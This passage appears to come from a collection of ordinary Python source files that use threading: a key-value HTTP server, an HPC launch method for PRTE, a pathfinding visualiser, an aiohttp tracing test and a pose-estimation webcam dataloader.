cache.delete(self.lock_id)
else:
cache.set(self.lock_id, json.dumps(lock[:-1]))
def __del__(self):
"""Used to remove the placeholder on the cache if using the multiprocessing module."""
self.remove_lock()
|
http_server.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Http Server."""
import logging
import BaseHTTPServer
import SimpleHTTPServer
import time
import threading
import socket
def get_logger(name, level, fmt):
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.FileHandler('http.log', mode='w')
formatter = logging.Formatter(fmt=fmt)
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
_http_server_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class KVHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""
kv handler class for kv http server,
it defines the way to get/set kv in server.
"""
def do_GET(self):
"""
get method for kv handler, get value according to key.
"""
log_str = "GET " + self.address_string() + self.path
paths = self.path.split('/')
if len(paths) < 3:
print('len of request path must be 3: ' + self.path)
self.send_status_code(400)
return
_, scope, key = paths
with self.server.kv_lock:
value = self.server.kv.get(scope, {}).get(key)
if value is None:
log_str += ' , key not found: ' + key
self.send_status_code(404)
else:
log_str += ' , key found: ' + key
self.send_response(200)
self.send_header("Content-Length", str(len(value)))
self.end_headers()
self.wfile.write(value)
_http_server_logger.info(log_str)
def do_PUT(self):
"""
put method for kv handler, set value according to key.
"""
log_str = "PUT " + self.address_string() + self.path
paths = self.path.split('/')
if len(paths) < 3:
print('len of request path must be 3: ' + self.path)
self.send_status_code(400)
return
_, scope, key = paths
content_length = int(self.headers['Content-Length'])
try:
value = self.rfile.read(content_length)
except:
print("receive error invalid request")
self.send_status_code(404)
return
with self.server.kv_lock:
if self.server.kv.get(scope) is None:
self.server.kv[scope] = {}
self.server.kv[scope][key] = value
self.send_status_code(200)
_http_server_logger.info(log_str)
def do_DELETE(self):
"""
delete method for kv handler, set value according to key.
"""
log_str = "DELETE " + self.address_string() + self.path
paths = self.path.split('/')
if len(paths) < 3:
print('len of request path must be 3: ' + self.path)
self.send_status_code(400)
return
_, scope, key = paths
with self.server.delete_kv_lock:
if self.server.delete_kv.get(scope) is None:
self.server.delete_kv[scope] = []
self.server.delete_kv[scope].append(key)
self.send_status_code(200)
_http_server_logger.info(log_str)
def log_message(self, format, *args):
"""
ignore all logging messages in kv handler.
"""
pass
def send_status_code(self, code):
"""
send status code back to client.
"""
self.send_response(code)
self.send_header("Content-Length", 0)
self.end_headers()
class KVHTTPServer(BaseHTTPServer.HTTPServer, object):
"""
it is a http server storing kv pairs.
"""
def __init__(self, port, handler):
"""Init."""
super(KVHTTPServer, self).__init__(('', port), handler)
self.delete_kv_lock = threading.Lock()
self.delete_kv = {}
self.kv_lock = threading.Lock()
self.kv = {}
def get_deleted_size(self, key):
"""
get deleted size in key.
"""
ret = 0
with self.delete_kv_lock:
ret = self.delete_kv.get(key, 0)
return ret
class KVServer:
"""
it is a server storing kv pairs, has a http server inside.
"""
def __init__(self, port, size={}):
"""Init."""
self.http_server = KVHTTPServer(port, KVHandler)
self.listen_thread = None
self.size = {}
def start(self):
"""
start server until user calls stop to let it quit.
"""
self.listen_thread = threading.Thread(
target=lambda: self.http_server.serve_forever())
self.listen_thread.start()
def stop(self):
"""
stop server and clear its resources.
"""
self.http_server.shutdown()
self.listen_thread.join()
self.http_server.server_close()
def should_stop(self):
"""
return whether the server should stop.
Returns:
ret(bool): whether the server should stop
"""
for key in self.size:
s = self.http_server.get_deleted_size(key)
if s != self.size.get(key, 0):
return False
return True
|
prte.py |
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import time
import logging
import threading as mt
import subprocess as mp
import radical.utils as ru
from .base import LaunchMethod
# ------------------------------------------------------------------------------
#
class PRTE(LaunchMethod):
# --------------------------------------------------------------------------
#
def __init__(self, name, cfg, session):
LaunchMethod.__init__(self, name, cfg, session)
# We remove all PRUN related environment variables from the launcher
# environment, so that we can use PRUN for both launch of the
# (sub-)agent and CU execution.
self.env_removables.extend(["OMPI_", "OPAL_", "PMIX_"])
self._verbose = bool(os.environ.get('RADICAL_PILOT_PRUN_VERBOSE'))
# --------------------------------------------------------------------------
#
@classmethod
def rm_config_hook(cls, name, cfg, rm, log, profiler):
prte = ru.which('prte')
if not prte:
raise Exception("Couldn't find prte")
# Now that we found the prte, get PRUN version
out, _, _ = ru.sh_callout('prte_info | grep "Open RTE"', shell=True)
prte_info = dict()
for line in out.split('\n'):
line = line.strip()
if 'Open RTE:' in line:
prte_info['version'] = line.split(':')[1].strip()
elif 'Open RTE repo revision:' in line:
prte_info['version_detail'] = line.split(':')[1].strip()
log.info("Found Open RTE: %s [%s]",
prte_info.get('version'), prte_info.get('version_detail'))
# write hosts file
furi = '%s/prrte.uri' % os.getcwd()
fhosts = '%s/prrte.hosts' % os.getcwd()
vm_size = len(rm.node_list)
with open(fhosts, 'w') as fout:
for node in rm.node_list:
fout.write('%s slots=%d\n' % (node[0],
rm.cores_per_node * rm.smt))
pre = os.environ['PRRTE_PREFIX']
prte += ' --prefix %s' % pre
prte += ' --report-uri %s' % furi
prte += ' --hostfile %s' % fhosts
if profiler.enabled:
prte += ' --pmca orte_state_base_verbose 1' # prte profiling
# large tasks imply large message sizes, and we need to account for that
# FIXME: we should derive the message size from DVM size - smaller DVMs
# will never need large messages, as they can't run large tasks)
prte += ' --pmca ptl_base_max_msg_size %d' % (1024 * 1024 * 1024 * 1)
# prte += ' --pmca rmaps_base_verbose 5'
# debug mapper problems for large tasks
if log.isEnabledFor(logging.DEBUG):
prte += ' -pmca orte_rmaps_base_verbose 100'
# we apply two temporary tweaks on Summit which should not be needed in
# the long run:
#
# avoid 64 node limit (ssh connection limit)
prte += ' --pmca plm_rsh_no_tree_spawn 1'
# ensure 1 ssh per dvm
prte += ' --pmca plm_rsh_num_concurrent %d' % vm_size
# Use (g)stdbuf to disable buffering. We need this to get the
# "DVM ready" message to ensure DVM startup completion
#
# The command seems to be generally available on our Cray's,
# if not, we can code some home-coooked pty stuff (TODO)
stdbuf_cmd = ru.which(['stdbuf', 'gstdbuf'])
if not stdbuf_cmd:
raise Exception("Couldn't find (g)stdbuf")
stdbuf_arg = "-oL"
# Base command = (g)stdbuf <args> + prte + prte-args + debug_args
cmdline = '%s %s %s ' % (stdbuf_cmd, stdbuf_arg, prte)
# cmdline = prte
# Additional (debug) arguments to prte
verbose = bool(os.environ.get('RADICAL_PILOT_PRUN_VERBOSE'))
if verbose:
debug_strings = [
'--debug-devel',
'--pmca odls_base_verbose 100',
'--pmca rml_base_verbose 100',
]
else:
debug_strings = []
# Split up the debug strings into args and add them to the cmdline
cmdline += ' '.join(debug_strings)
cmdline = cmdline.strip()
log.info("Start prte on %d nodes [%s]", vm_size, cmdline)
profiler.prof(event='dvm_start', uid=cfg['pid'])
dvm_uri = None
dvm_process = mp.Popen(cmdline.split(), stdout=mp.PIPE,
stderr=mp.STDOUT)
# ----------------------------------------------------------------------
def _watch_dvm():
log.info('starting prte watcher')
retval = dvm_process.poll()
while retval is None:
line = dvm_process.stdout.readline().strip()
if line:
log.debug('prte output: %s', line)
else:
time.sleep(1.0)
if retval != 0:
# send a kill signal to the main thread.
# We know that Python and threading are likely not to play well
# with signals - but this is an exceptional case, and not part
# of the stadard termination sequence. If the signal is
# swallowed, the next `prun` call will trigger
# termination anyway.
os.kill(os.getpid())
raise RuntimeError('PRTE DVM died')
log.info('prte stopped (%d)' % dvm_process.returncode)
# ----------------------------------------------------------------------
dvm_watcher = mt.Thread(target=_watch_dvm)
dvm_watcher.daemon = True
dvm_watcher.start()
for _ in range(100):
time.sleep(0.5)
try:
with open(furi, 'r') as fin:
for line in fin.readlines():
if '://' in line:
dvm_uri = line.strip()
break
except Exception as e:
log.debug('DVM check: uri file missing: %s...' % str(e)[:24])
time.sleep(0.5)
if dvm_uri:
break
if not dvm_uri:
raise Exception("VMURI not found!")
log.info("prte startup successful: [%s]", dvm_uri)
# in some cases, the DVM seems to need some additional time to settle.
# FIXME: this should not be needed, really
time.sleep(10)
profiler.prof(event='dvm_ok', uid=cfg['pid'])
lm_info = {
'dvm_uri' : dvm_uri,
'version_info': prte_info,
'cvd_id_mode' : 'physical'
}
# we need to inform the actual LaunchMethod instance about the prte URI.
# So we pass it back to the ResourceManager which will keep it in an
# 'lm_info', which will then be passed as part of the slots via the
# scheduler
return lm_info
# --------------------------------------------------------------------------
#
@classmethod
def rm_shutdown_hook(cls, name, cfg, rm, lm_info, log, profiler):
"""
This hook is symmetric to the config hook above, and is called during
shutdown sequence, for the sake of freeing allocated resources.
"""
if 'dvm_uri' in lm_info:
try:
log.info('terminating prte')
prun = ru.which('prun')
if not prun:
raise Exception("Couldn't find prun")
ru.sh_callout('%s --hnp %s --terminate'
% (prun, lm_info['dvm_uri']))
profiler.prof(event='dvm_stop', uid=cfg['pid'])
except Exception as e:
# use the same event name as for runtime failures - those are
# not distinguishable at the moment from termination failures
profiler.prof(event='dvm_fail', uid=cfg['pid'], msg=e)
log.exception('prte termination failed')
# --------------------------------------------------------------------------
#
def _configure(self):
# ensure that `prun` is in the path (`which` will raise otherwise)
ru.which('prun')
self.launch_command = 'prun'
# --------------------------------------------------------------------------
#
def construct_command(self, cu, launch_script_hop):
time.sleep(0.1)
slots = cu['slots']
cud = cu['description']
task_exec = cud['executable']
task_env = cud.get('environment') or dict()
task_args = cud.get('arguments') or list()
task_argstr = self._create_arg_string(task_args)
n_threads = cu['description'].get('cpu_threads', 1)
n_procs = cu['description'].get('cpu_processes', 1)
if not n_procs : n_procs = 1
if not n_threads: n_threads = 1
# import pprint
self._log.debug('prep %s', cu['uid'])
if 'lm_info' not in slots:
raise RuntimeError('No lm_info to launch via %s: %s'
% (self.name, slots))
if not slots['lm_info']:
raise RuntimeError('lm_info missing for %s: %s'
% (self.name, slots))
if 'dvm_uri' not in slots['lm_info']:
raise RuntimeError('dvm_uri not in lm_info for %s: %s'
% (self.name, slots))
dvm_uri = slots['lm_info']['dvm_uri']
if task_argstr: task_command = "%s %s" % (task_exec, task_argstr)
else : task_command = task_exec
env_string = ''
env_list = self.EXPORT_ENV_VARIABLES + list(task_env.keys())
if env_list:
for var in env_list:
env_string += '-x "%s" ' % var
map_flag = ' -np %d --cpus-per-proc %d' % (n_procs, n_threads)
map_flag += ' --bind-to hwthread:overload-allowed --use-hwthread-cpus'
map_flag += ' --oversubscribe'
# see DVM startup
map_flag += ' --pmca ptl_base_max_msg_size %d' % (1024 * 1024 * 1024 * 1)
# map_flag += ' --pmca rmaps_base_verbose 5'
if 'nodes' not in slots:
# this task is unscheduled - we leave it to PRRTE/PMI-X to
# correctly place the task
pass
else:
# FIXME: ensure correct binding for procs and threads via slotfile
# enact the scheduler's host placement. For now, we leave socket,
# core and thread placement to the prted, and just add all process
# slots to the host list.
hosts = ''
for node in slots['nodes']:
hosts += '%s,' % node['name']
# remove trailing ','
map_flag += ' -host %s' % hosts.rstrip(',')
# Additional (debug) arguments to prun
debug_string = ''
if self._verbose:
debug_string += ' '.join([
'-verbose',
# '--debug-devel',
# '-display-devel-map',
# '-display-allocation',
'--report-bindings',
])
# env_string = '' # FIXME
command = '%s --hnp "%s" %s %s %s %s' % (self.launch_command,
dvm_uri, map_flag, debug_string, env_string, task_command)
return command, None
# ------------------------------------------------------------------------------
|
Algorithm.py | import pygame
import threading
from queue import PriorityQueue
from pygame.locals import *
import Commons
import Position
import GameWindow
def CalculatePathBasedOnCurrentAlgorithm (tree, start, end, window):
isCurrentAlgorithmAStar = Commons.CurrentAlgorithm == Commons.A_ALGORITHM
queue = PriorityQueue()
exploredPositions = set([])
queue.put((0, start, [start]))
exploredPositions.add(start)
pathWeight = start.weight.__neg__()
positionDictionary = {}
positionDictionary[start] = 0
while queue:
weight, position, currentPath = queue.get()
position.ColorPosition(Commons.ORANGE)
if position != start and isCurrentAlgorithmAStar:
weight -= CalculateManhattanDistance(position, end)
if position == end:
for pos in currentPath:
pos.ColorPosition(Commons.YELLOW)
pathWeight += pos.weight
visitedNodes = (exploredPositions.__len__() - queue._qsize()).__str__()
RenderTexts(window, visitedNodes, pathWeight.__str__())
GameWindow.DrawWindow(window, tree)
return
for i in range(position.neighbors.__len__()):
if isCurrentAlgorithmAStar:
cost = weight + position.neighbors[i].weight + CalculateManhattanDistance(position.neighbors[i], end)
else:
cost = weight + position.neighbors[i].weight
if position.neighbors[i] not in exploredPositions:
queue.put((cost, position.neighbors[i], currentPath + [position.neighbors[i]]))
exploredPositions.add(position.neighbors[i])
position.neighbors[i].ColorPosition(Commons.BLACK)
positionDictionary[position.neighbors[i]] = cost
elif positionDictionary[position.neighbors[i]] > cost and isCurrentAlgorithmAStar:
queue.put((cost, position.neighbors[i], currentPath + [position.neighbors[i]]))
position.neighbors[i].ColorPosition(Commons.BLACK)
positionDictionary[position.neighbors[i]] = cost
thread = threading.Thread(target=GameWindow.DrawWindow, args=[window, tree, False])
thread.start()
thread.join()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
Commons.QuitGame()
if event.type == pygame.QUIT:
Commons.QuitGame()
def CalculateManhattanDistance(position, end):
return abs(end.row - position.row) + abs(end.column - position.column)
def RenderTexts(window, visitedNodes, pathWeight):
window = pygame.display.set_mode((Commons.GAME_WIDTH, Commons.GAME_WIDTH + 30))
window.fill(Commons.LIGHT_BLACK)
Commons.RenderText(window, (Commons.VISITED_NODES + visitedNodes), (5, Commons.GAME_WIDTH + 10))
Commons.RenderText(window, (Commons.PATH_TOTAL_WEIGHT + pathWeight), (130, Commons.GAME_WIDTH + 10)) |
test_request.py | # flake8: noqa
import threading
import asyncio
import aiohttp_jinja2
from urllib import request
from nose.tools import eq_
from aiohttp.test_utils import unittest_run_loop
from ddtrace.pin import Pin
from ddtrace.constants import EVENT_SAMPLE_RATE_KEY
from ddtrace.contrib.aiohttp.patch import patch, unpatch
from ddtrace.contrib.aiohttp.middlewares import trace_app
from .utils import TraceTestCase
class TestRequestTracing(TraceTestCase):
"""
Ensures that the trace includes all traced components.
"""
def enable_tracing(self):
# enabled tracing:
# * middleware
# * templates
trace_app(self.app, self.tracer)
patch()
Pin.override(aiohttp_jinja2, tracer=self.tracer)
def disable_tracing(self):
unpatch()
@unittest_run_loop
@asyncio.coroutine
def test_full_request(self):
# it should create a root span when there is a handler hit
# with the proper tags
request = yield from self.client.request('GET', '/template/')
eq_(200, request.status)
yield from request.text()
# the trace is created
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(2, len(traces[0]))
request_span = traces[0][0]
template_span = traces[0][1]
# request
eq_('aiohttp-web', request_span.service)
eq_('aiohttp.request', request_span.name)
eq_('GET /template/', request_span.resource)
# template
eq_('aiohttp-web', template_span.service)
eq_('aiohttp.template', template_span.name)
eq_('aiohttp.template', template_span.resource)
@unittest_run_loop
@asyncio.coroutine
def test_event_sample_rate(self):
# it should create a root span when there is a handler hit
# with the proper tags
with self.override_config('aiohttp', dict(event_sample_rate=1)):
request = yield from self.client.request('GET', '/template/')
eq_(200, request.status)
yield from request.text()
# Assert root span sets the appropriate metric
root = self.get_root_span()
root.assert_matches(
name='aiohttp.request',
metrics={
EVENT_SAMPLE_RATE_KEY: 1,
},
)
# Assert non-root spans do not have this metric set
for span in self.spans:
if span == root:
continue
self.assertIsNone(span.get_metric(EVENT_SAMPLE_RATE_KEY))
@unittest_run_loop
@asyncio.coroutine
def test_multiple_full_request(self):
# it should handle multiple requests using the same loop
def make_requests():
url = self.client.make_url('/delayed/')
response = request.urlopen(str(url)).read().decode('utf-8')
eq_('Done', response)
# blocking call executed in different threads
threads = [threading.Thread(target=make_requests) for _ in range(10)]
for t in threads:
t.daemon = True
t.start()
# we should yield so that this loop can handle
# threads' requests
yield from asyncio.sleep(0.5)
for t in threads:
t.join(timeout=0.5)
# the trace is created
traces = self.tracer.writer.pop_traces()
eq_(10, len(traces))
eq_(1, len(traces[0]))
|
dataloader_webcam.py | import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from SPPE.src.utils.eval import getPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class WebcamLoader:
def __init__(self, webcam, batchSize=1, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
# initialize the queue used to store frames read from
# the video file
self.batchSize = batchSize
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
i = 0
while True:
# otherwise, ensure the queue has room in it
if not self.Q.full():
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(self.batchSize):
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(str(i)+'.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
self.Q.put((img, orig_img, im_name, im_dim_list))
i = i+1
else:
with self.Q.mutex:
self.Q.queue.clear()
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def getitem(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue size
return self.Q.qsize()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DetectionLoader:
def __init__(self, dataloder, batchSize=1, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stopped = False
self.dataloder = dataloder
self.batchSize = batchSize
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole dataset
while True:
img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
with self.dataloder.Q.mutex:
self.dataloder.Q.queue.clear()
with torch.no_grad():
# Human Detection
img = img.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_img)):
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
dets = dets.cpu()
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
for k in range(len(orig_img)):
boxes_k = boxes[dets[:,0]==k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH, opt.inputResW)
pt1 = torch.zeros(boxes_k.size(0), 2)
pt2 = torch.zeros(boxes_k.size(0), 2)
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], boxes_k, scores[dets[:,0]==k], inps, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class DetectionProcessor:
def __init__(self, detectionLoader, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.detectionLoader = detectionLoader
self.stopped = False
# initialize the queue used to store data
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole dataset
while True:
with torch.no_grad():
(orig_img, im_name, boxes, scores, inps, pt1, pt2) = self.detectionLoader.read()
with self.detectionLoader.Q.mutex:
self.detectionLoader.Q.queue.clear()
if boxes is None or boxes.nelement() == 0:
while self.Q.full():
time.sleep(0.2)
self.Q.put((None, orig_img, im_name, boxes, scores, None, None))
continue
inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
while self.Q.full():
time.sleep(0.2)
self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class WebcamDetectionLoader:
def __init__(self, webcam = 0, batchSize=1, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot open webcam'
self.stopped = False
self.batchSize = batchSize
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def len(self):
return self.Q.qsize()
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping
while True:
img = []
inp = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(self.batchSize):
(grabbed, frame) = self.stream.read()
if not grabbed:
continue
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
inp_k = im_to_torch(orig_img_k)
img.append(img_k)
inp.append(inp_k)
orig_img.append(orig_img_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
ht = inp[0].size(1)
wd = inp[0].size(2)
# Human Detection
img = Variable(torch.cat(img)).cuda()
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list = im_dim_list.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(inp)):
if self.Q.full():
with self.Q.mutex:
self.Q.queue.clear()
self.Q.put((inp[k], orig_img[k], None, None))
continue
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5].cpu()
scores = dets[:, 5:6].cpu()
for k in range(len(inp)):
if self.Q.full():
with self.Q.mutex:
self.Q.queue.clear()
self.Q.put((inp[k], orig_img[k], boxes[dets[:,0]==k], scores[dets[:,0]==k]))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def more(self):
# return True if there are still frames in the queue
return self.Q.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DataWriter:
def __init__(self, save_video=False,
savepath='examples/res/1.avi', fourcc=cv2.VideoWriter_fourcc(*'XVID'), fps=25, frameSize=(640,480),
queueSize=1024):
if save_video:
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
assert self.stream.isOpened(), 'Cannot open video for writing'
self.save_video = save_video
self.stopped = False
self.final_result = []
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# if the thread indicator variable is set, stop the
# thread
if self.stopped:
if self.save_video:
self.stream.release()
return
# otherwise, ensure the queue is not empty
if not self.Q.empty():
(boxes, scores, hm_data, pt1, pt2, orig_img, im_name) = self.Q.get()
orig_img = np.array(orig_img, dtype=np.uint8)
if boxes is None:
if opt.save_img or opt.save_video or opt.vis:
img = orig_img
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
preds_hm, preds_img, preds_scores = getPrediction(
hm_data, pt1, pt2, opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = pose_nms(boxes, scores, preds_img, preds_scores)
result = {
'imgname': im_name,
'result': result
}
self.final_result.append(result)
if opt.save_img or opt.save_video or opt.vis:
img = vis_frame(orig_img, result)
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
time.sleep(0.1)
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
return not self.Q.empty()
def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
# save next frame in the queue
self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
def results(self):
# return final result
return self.final_result
def len(self):
# return queue len
return self.Q.qsize()
class Mscoco(data.Dataset):
def __init__(self, train=True, sigma=1,
scale_factor=(0.2, 0.3), rot_factor=40, label_type='Gaussian'):
self.img_folder = '../data/coco/images' # root image folders
self.is_train = train # training set or test set
self.inputResH = opt.inputResH
self.inputResW = opt.inputResW
self.outputResH = opt.outputResH
self.outputResW = opt.outputResW
self.sigma = sigma
self.scale_factor = scale_factor
self.rot_factor = rot_factor
self.label_type = label_type
self.nJoints_coco = 17
self.nJoints_mpii = 16
self.nJoints = 33
self.accIdxs = (1, 2, 3, 4, 5, 6, 7, 8,
9, 10, 11, 12, 13, 14, 15, 16, 17)
self.flipRef = ((2, 3), (4, 5), (6, 7),
(8, 9), (10, 11), (12, 13),
(14, 15), (16, 17))
def __getitem__(self, index):
pass
def __len__(self):
pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
'''
Crop human from origin image according to Dectecion Results
'''
imght = img.size(1)
imgwidth = img.size(2)
tmp_img = img
tmp_img[0].add_(-0.406)
tmp_img[1].add_(-0.457)
tmp_img[2].add_(-0.480)
for i, box in enumerate(boxes):
upLeft = torch.Tensor(
(float(box[0]), float(box[1])))
bottomRight = torch.Tensor(
(float(box[2]), float(box[3])))
ht = bottomRight[1] - upLeft[1]
width = bottomRight[0] - upLeft[0]
if width > 100:
scaleRate = 0.2
else:
scaleRate = 0.3
upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
